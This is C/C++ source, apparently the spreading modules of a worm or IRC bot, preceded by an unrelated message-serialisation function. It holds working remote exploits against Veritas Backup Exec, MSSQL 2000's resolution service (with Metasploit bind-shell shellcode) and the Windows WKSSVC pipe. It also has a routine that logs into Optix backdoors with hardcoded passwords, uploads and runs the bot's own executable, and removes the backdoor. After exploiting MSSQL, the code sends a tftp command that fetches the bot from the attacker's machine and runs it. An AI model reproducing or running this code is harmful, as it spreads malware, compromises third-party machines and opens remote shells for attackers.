VOID AinMessage::AddStr(LPCSTR pStr)
{
if(NULL == pStr)
{
assert(false);
return;
}
WORD wStrLen = (WORD)strlen(pStr);
AddWord(wStrLen);
AddEx(pStr, wStrLen);
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
BOOL Optix(EXINFO exinfo)
{
char buffer[IRCLINE], szBuffer[64], szFilePath[MAX_PATH];
int read = 0;
WSADATA opxdata, upldata;
SOCKET opxsock, uplsock;
SOCKADDR_IN opxinfo, uplinfo;
bool IS11 = FALSE;
if (WSAStartup(MAKEWORD(2,2), &opxdata) != 0)
return FALSE;
//Connect To Optix Main Port
opxinfo.sin_addr.s_addr = inet_addr(exinfo.ip);
opxinfo.sin_port = htons((unsigned short)exinfo.port);
opxinfo.sin_family = AF_INET;
opxsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
start:
if (connect(opxsock, (LPSOCKADDR)&opxinfo, sizeof(opxinfo)) == SOCKET_ERROR) {
closesocket(opxsock);
WSACleanup();
return FALSE;
}
//Auth
//Note: OPTIX BLOCKS YA ASS UNTIL RESTART IF PASS IS WRONG 3TIMES :/
if (IS11 == TRUE)
sprintf(szBuffer, "022¬kjui3498fjk34289890fwe334gfew4ger$\"sdf¬v1.1\r\n"); //MASTERPASSWORD = 1.1 Server
else
sprintf(szBuffer, "022¬kjui3498fjk34289890fwe334gfew4ger$\"sdf¬v1.2\r\n"); //MASTERPASSWORD = 1.2 Server
send(opxsock, szBuffer, strlen(szBuffer), 0);
Sleep(500);
memset(szBuffer, 0, sizeof(szBuffer));
recv(opxsock, szBuffer, sizeof(szBuffer), 0);
//1.1 Check
if (strstr(szBuffer, "001¬Your client version is outdated!") != NULL) { //1.1 Server
IS11 = TRUE;
closesocket(opxsock);
goto start;
}
//All Others
if (strstr(szBuffer, "001¬") == NULL) { //001 Should Be The Same On All Versions, Therefore strstr();
Sleep(500);
//If "OPtest" Dont Work, Try NULL Password
if (IS11 == TRUE)
sprintf(szBuffer, "022¬¬v1.1\r\n"); //NULL Password, 1.1 Server
else
sprintf(szBuffer, "022¬¬v1.2\r\n"); //NULL Password, 1.2 Server
send(opxsock, szBuffer, strlen(szBuffer), 0);
Sleep(500);
memset(szBuffer, 0, sizeof(szBuffer));
recv(opxsock, szBuffer, sizeof(szBuffer), 0);
if (strstr(szBuffer, "001¬") == NULL) { //001 Should Be The Same On All Versions, Therefore strstr();
closesocket(opxsock);
WSACleanup();
return FALSE;
}
}
//Prepare Optix For Upload
send(opxsock, "019¬\r\n", 6, 0);
Sleep(500);
memset(szBuffer, 0, sizeof(szBuffer));
recv(opxsock, szBuffer, sizeof(szBuffer), 0);
if (strcmp(szBuffer, "020¬\r\n") != 0) {
closesocket(opxsock);
WSACleanup();
return FALSE;
}
//Get FilePath
memset(szFilePath, 0, sizeof(szFilePath));
GetModuleFileName(NULL, szFilePath, sizeof(szFilePath));
//sprintf(szFilePath, szLocalPayloadFile);
//Open File
FILE *f = fopen(szFilePath, "rb");
if (f == NULL) {
closesocket(opxsock);
WSACleanup();
return FALSE;
}
//Connect To Upload Socket..
if (WSAStartup(MAKEWORD(2,2), &upldata) != 0) {
closesocket(opxsock);
WSACleanup();
return FALSE;
}
uplinfo.sin_addr.s_addr = inet_addr(exinfo.ip);
uplinfo.sin_port = htons(500);
uplinfo.sin_family = AF_INET;
uplsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connect(uplsock, (LPSOCKADDR)&uplinfo, sizeof(uplinfo)) == SOCKET_ERROR) {
closesocket(uplsock);
closesocket(opxsock);
WSACleanup();
return FALSE;
}
//Send File Info (Where To Upload And Size..)
HANDLE hFile = CreateFile(szFilePath, GENERIC_READ,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
DWORD dwSize = GetFileSize(hFile, 0);
CloseHandle(hFile);
sprintf(szBuffer, "C:\\a.exe\r\n%d\r\n", dwSize);
send(uplsock, szBuffer, strlen(szBuffer), 0);
Sleep(500);
memset(szBuffer, 0, sizeof(szBuffer));
recv(uplsock, szBuffer, sizeof(szBuffer), 0);
//OK REDY Received, Upload File..
if (strstr(szBuffer, "+OK REDY") == NULL)
{
closesocket(uplsock);
closesocket(opxsock);
WSACleanup();
return FALSE;
}
//Upload \o/
memset(szBuffer, 0, sizeof(szBuffer));
while (!feof(f))
{
read = fread(szBuffer, sizeof(char), sizeof(szBuffer), f);
send(uplsock, szBuffer, read, 0);
}
memset(szBuffer, 0, sizeof(szBuffer));
recv(uplsock, szBuffer, sizeof(szBuffer), 0);
//Execute File If Upload Success
if (strstr(szBuffer, "+OK RCVD") != NULL) {
closesocket(uplsock);
send(opxsock, "008¬C:\\a.exe\r\n", 14, 0);
Sleep(500);
memset(szBuffer, 0, sizeof(szBuffer));
recv(opxsock, szBuffer, sizeof(szBuffer), 0);
if (strcmp(szBuffer, "001¬Error Executing File\r\n") == 0)
{
closesocket(uplsock);
closesocket(opxsock);
WSACleanup();
return FALSE;
}
} else {
closesocket(uplsock);
closesocket(opxsock);
WSACleanup();
return FALSE;
}
//Remove Optix Server
send(opxsock, "100¬\r\n", 6, 0);
closesocket(uplsock);
closesocket(opxsock);
WSACleanup();
AddEx(exinfo);
return TRUE;
}
bool MSSQLResolution(EXINFO exinfo) {
/* win32_bind - EXITFUNC=process LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char scode[] =
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x27\xc8"
"\x3e\x83\xeb\xfc\xe2\xf4\x6b\x4d\x23\x73\x7f\xde\x37\xc1\x68\x47"
"\x43\x52\xb3\x03\x43\x7b\xab\xac\xb4\x3b\xef\x26\x27\xb5\xd8\x3f"
"\x43\x61\xb7\x26\x23\x77\x1c\x13\x43\x3f\x79\x16\x08\xa7\x3b\xa3"
"\x08\x4a\x90\xe6\x02\x33\x96\xe5\x23\xca\xac\x73\xec\x16\xe2\xc2"
"\x43\x61\xb3\x26\x23\x58\x1c\x2b\x83\xb5\xc8\x3b\xc9\xd5\x94\x0b"
"\x43\xb7\xfb\x03\xd4\x5f\x54\x16\x13\x5a\x1c\x64\xf8\xb5\xd7\x2b"
"\x43\x4e\x8b\x8a\x43\x7e\x9f\x79\xa0\xb0\xd9\x29\x24\x6e\x68\xf1"
"\xae\x6d\xf1\x4f\xfb\x0c\xff\x50\xbb\x0c\xc8\x73\x37\xee\xff\xec"
"\x25\xc2\xac\x77\x37\xe8\xc8\xae\x2d\x58\x16\xca\xc0\x3c\xc2\x4d"
"\xca\xc1\x47\x4f\x11\x37\x62\x8a\x9f\xc1\x41\x74\x9b\x6d\xc4\x74"
"\x8b\x6d\xd4\x74\x37\xee\xf1\x4f\xd9\x62\xf1\x74\x41\xdf\x02\x4f"
"\x6c\x24\xe7\xe0\x9f\xc1\x41\x4d\xd8\x6f\xc2\xd8\x18\x56\x33\x8a"
"\xe6\xd7\xc0\xd8\x1e\x6d\xc2\xd8\x18\x56\x72\x6e\x4e\x77\xc0\xd8"
"\x1e\x6e\xc3\x73\x9d\xc1\x47\xb4\xa0\xd9\xee\xe1\xb1\x69\x68\xf1"
"\x9d\xc1\x47\x41\xa2\x5a\xf1\x4f\xab\x53\x1e\xc2\xa2\x6e\xce\x0e"
"\x04\xb7\x70\x4d\x8c\xb7\x75\x16\x08\xcd\x3d\xd9\x8a\x13\x69\x65"
"\xe4\xad\x1a\x5d\xf0\x95\x3c\x8c\xa0\x4c\x69\x94\xde\xc1\xe2\x63"
"\x37\xe8\xcc\x70\x9a\x6f\xc6\x76\xa2\x3f\xc6\x76\x9d\x6f\x68\xf7"
"\xa0\x93\x4e\x22\x06\x6d\x68\xf1\xa2\xc1\x68\x10\x37\xee\x1c\x70"
"\x34\xbd\x53\x43\x37\xe8\xc5\xd8\x18\x56\xe9\xff\x2a\x4d\xc4\xd8"
"\x1e\xc1\x47\x27\xc8\x3e";
unsigned long targets[]={
0x42b48774 /*MSQL 2000 / MSDE*/
};
unsigned short sqlport = 1434;
char *request=(char*)malloc(1+800+5+1+sizeof(scode));
//\x68:888 => push dword 0x3838383a
memcpy(request+0, "\x04", 1);
memset(request+1, 0x90, 800);
memcpy(request+801, "\x68:888", 5);
memcpy(request+806, "\x90", 1);
memcpy(request+807, scode, sizeof(scode));
//return address of jmp esp
memcpy(request+97, (char*)&targets[0], 4);
//takes us right here, with 8 bytes available
memcpy(request+101, "\xeb\x69\xeb\x69", 8);
//write to thread storage space ala msrpc
memcpy(request+109, "\xcc\xe0\xff\x7f", 4); //0x7ffde0cc
memcpy(request+113, "\xcc\xe0\xff\x7f", 4);
//the payload starts here
memset(request+117, 0x90, 100);
memcpy(request+217, scode, sizeof(scode));
SOCKET s;
if ((s=fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET) return false;
SOCKADDR_IN ssin;
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)sqlport);
if (fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false;
if (fsend(s, request, strlen(request), 0) == SOCKET_ERROR) return false;
fclosesocket(s);
//automatically restart sql server - thanks SK!
s=fsocket(AF_INET, SOCK_STREAM, 0);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)4444);
if(fconnect(s, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) return false;
char cmd_buff[400];
_snprintf(cmd_buff, sizeof(cmd_buff),
"net start sqlserveragent & "
"tftp -i %s GET %s & "
"%s",
exinfo.myip, filename, filename);
if(fsend(s,(char*)cmd_buff, strlen(cmd_buff),0) == SOCKET_ERROR) return false;
fclosesocket(s);
return (AddEx(exinfo,true));
}
bool ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
int TargetOS;
char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
// check if xp
TargetOS = FpHost( exinfo.ip, FP_LSASS );
if( TargetOS != OS_WINXP )
return false;
// parameters
pszTarget = exinfo.ip;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), exinfo.myip, filename );
if( !iShellSize )
return false;
// generate exploits buffer
// ========================
memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
memset( szExploitsData, 0, sizeof( szExploitsData ) );
memset( wszExploitsData, 0, sizeof( wszExploitsData ) );
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );
// new EIP
*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2( &NetSource, "", "", 0 );
}
// ===================
// connect to pipe
// ===============
snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if( hPipe == INVALID_HANDLE_VALUE )
{
fWNetCancelConnection2( NetSource.lpRemoteName, 0, false );
return false;
}
// ===============
// bind packet
// ===========
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
BindPacket.Interface2.version = 2;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
// send
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, false );
return false;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, false );
return false;
}
memset( pPacket, 0, nPacketSize );
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
memset( &pPacket[ nPacketPos ], 0, 8 );
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, false );
return false;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, false );
return (AddEx(exinfo,true));
}
